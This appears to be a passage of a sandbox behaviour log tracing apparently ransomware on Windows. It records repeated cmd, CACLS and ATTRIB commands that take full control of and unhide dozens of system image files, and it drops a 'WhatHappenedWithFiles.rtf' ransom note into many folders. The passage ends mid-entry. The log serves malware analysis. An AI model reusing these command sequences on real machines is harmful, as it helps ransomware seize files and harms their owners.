"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
5⤵
PID:2320

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
6⤵
PID:1672

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
6⤵
- Views/modifies file attributes
PID:2776

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
5⤵
PID:1740

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
6⤵
PID:2352

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
6⤵
- Views/modifies file attributes
PID:2500

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\DEVICE~1\Device\{8702D~1\WhatHappenedWithFiles.rtf"
5⤵
PID:2632

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
5⤵
PID:2484

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
6⤵
PID:2492

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
6⤵
- Views/modifies file attributes
PID:2136

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\MF\WhatHappenedWithFiles.rtf"
5⤵
PID:1148

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\OFFICE\UICAPT~1\1036\WhatHappenedWithFiles.rtf"
5⤵
PID:2612

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\OFFICE\UICAPT~1\3082\WhatHappenedWithFiles.rtf"
5⤵
PID:2892

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp"
5⤵
PID:1544

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp" /E /G Admin:F /C
6⤵
PID:832

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp"
6⤵
- Views/modifies file attributes
PID:1496

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\USERAC~1\DEFAUL~1\WhatHappenedWithFiles.rtf"
5⤵
PID:284

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp"
5⤵
PID:1272

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp" /E /G Admin:F /C
6⤵
PID:2080

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp"
6⤵
- Views/modifies file attributes
PID:2684

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp"
5⤵
PID:2100

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp" /E /G Admin:F /C
6⤵
PID:2968

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp"
6⤵
- Views/modifies file attributes
PID:740

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp"
5⤵
PID:2552

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp" /E /G Admin:F /C
6⤵
PID:2440

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp"
6⤵
- Views/modifies file attributes
PID:2384

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp"
5⤵
PID:2752

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp" /E /G Admin:F /C
6⤵
PID:696

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp"
6⤵
- Views/modifies file attributes
PID:2576

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp"
5⤵
PID:2832

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp" /E /G Admin:F /C
6⤵
PID:2480

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp"
6⤵
- Views/modifies file attributes
PID:2424

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp"
5⤵
PID:1260

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp" /E /G Admin:F /C
6⤵
PID:1752

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp"
6⤵
- Views/modifies file attributes
PID:1028

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp"
5⤵
PID:1056

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp" /E /G Admin:F /C
6⤵
PID:964

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp"
6⤵
- Views/modifies file attributes
PID:2136

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp"
5⤵
PID:2800

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp" /E /G Admin:F /C
6⤵
PID:2484

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp"
6⤵
- Views/modifies file attributes
PID:784

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp"
5⤵
PID:1708

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp" /E /G Admin:F /C
6⤵
PID:2716

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp"
6⤵
- Views/modifies file attributes
PID:2216

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp"
5⤵
PID:2292

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp" /E /G Admin:F /C
6⤵
PID:2204

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp"
6⤵
- Views/modifies file attributes
PID:1768

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp"
5⤵
PID:1600

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp" /E /G Admin:F /C
6⤵
PID:2572

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp"
6⤵
- Views/modifies file attributes
PID:2648

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp"
5⤵
PID:2544

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp" /E /G Admin:F /C
6⤵
PID:432

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp"
6⤵
- Views/modifies file attributes
PID:1464

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp"
5⤵
PID:2616

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp" /E /G Admin:F /C
6⤵
PID:1988

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp"
6⤵
- Views/modifies file attributes
PID:396

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp"
5⤵
PID:1480

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp" /E /G Admin:F /C
6⤵
PID:3008

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp"
6⤵
- Views/modifies file attributes
PID:2268

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp"
5⤵
PID:1148

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp" /E /G Admin:F /C
6⤵
PID:2364

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp"
6⤵
- Views/modifies file attributes
PID:2496

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp"
5⤵
PID:2008

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp" /E /G Admin:F /C
6⤵
PID:2236

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp"
6⤵
- Views/modifies file attributes
PID:2340

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp"
5⤵
PID:2612

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp" /E /G Admin:F /C
6⤵
PID:528

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp"
6⤵
- Views/modifies file attributes
PID:1372

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp"
5⤵
PID:2820

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp" /E /G Admin:F /C
6⤵
PID:1284

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp"
6⤵
- Views/modifies file attributes
PID:1804

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp"
5⤵
PID:1980

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp" /E /G Admin:F /C
6⤵
PID:3028

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp"
6⤵
- Views/modifies file attributes
PID:1648

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp"
5⤵
PID:1732

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp" /E /G Admin:F /C
6⤵
PID:1956

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp"
6⤵
- Views/modifies file attributes
PID:2992

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp"
5⤵
PID:292

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp" /E /G Admin:F /C
6⤵
PID:1688

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp"
6⤵
- Views/modifies file attributes
PID:1952

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp"
5⤵
PID:1292

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp" /E /G Admin:F /C
6⤵
PID:2284

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp"
6⤵
- Views/modifies file attributes
PID:1100

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp"
5⤵
PID:2960

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp" /E /G Admin:F /C
6⤵
PID:1596

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp"
6⤵
- Views/modifies file attributes
PID:832

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp"
5⤵
PID:1496

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp" /E /G Admin:F /C
6⤵
PID:2756

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp"
6⤵
- Views/modifies file attributes
PID:1720

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp"
5⤵
PID:1868

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp" /E /G Admin:F /C
6⤵
PID:2080

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp"
6⤵
- Views/modifies file attributes
PID:1932

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp"
5⤵
PID:1272

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp" /E /G Admin:F /C
6⤵
PID:2968

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp"
6⤵
- Views/modifies file attributes
PID:740

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp"
5⤵
PID:2192

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp" /E /G Admin:F /C
6⤵
PID:1572

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp"
6⤵
- Views/modifies file attributes
PID:2776

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp"
5⤵
PID:3012

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp" /E /G Admin:F /C
6⤵
PID:1632

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp"
6⤵
- Views/modifies file attributes
PID:696

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp"
5⤵
PID:2348

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp" /E /G Admin:F /C
6⤵
PID:2972

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp"
6⤵
- Views/modifies file attributes
PID:2864

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp"
5⤵
PID:2480

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp" /E /G Admin:F /C
6⤵
PID:2200

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp"
6⤵
- Views/modifies file attributes
PID:2424

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp"
5⤵
PID:2012

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp" /E /G Admin:F /C
6⤵
PID:2556

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp"
6⤵
- Views/modifies file attributes
PID:2088

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp"
5⤵
PID:1244

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp" /E /G Admin:F /C
6⤵
PID:2500

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp"
6⤵
- Views/modifies file attributes
PID:2016

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp"
5⤵
PID:588

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp" /E /G Admin:F /C
6⤵
PID:2472

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp"
6⤵
- Views/modifies file attributes
PID:2908

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp"
5⤵
PID:2632

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp" /E /G Admin:F /C
6⤵
PID:1852

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp"
6⤵
- Views/modifies file attributes
PID:2596

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\USERAC~1\WhatHappenedWithFiles.rtf"
5⤵
PID:2872

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~2\WhatHappenedWithFiles.rtf"
5⤵
PID:2216

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft Help\Hx_1033_MValidator.Lck" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft Help\Hx_1033_MValidator.Lck"
5⤵
PID:2904

C:\Windows\SysWOW64\cacls.exe
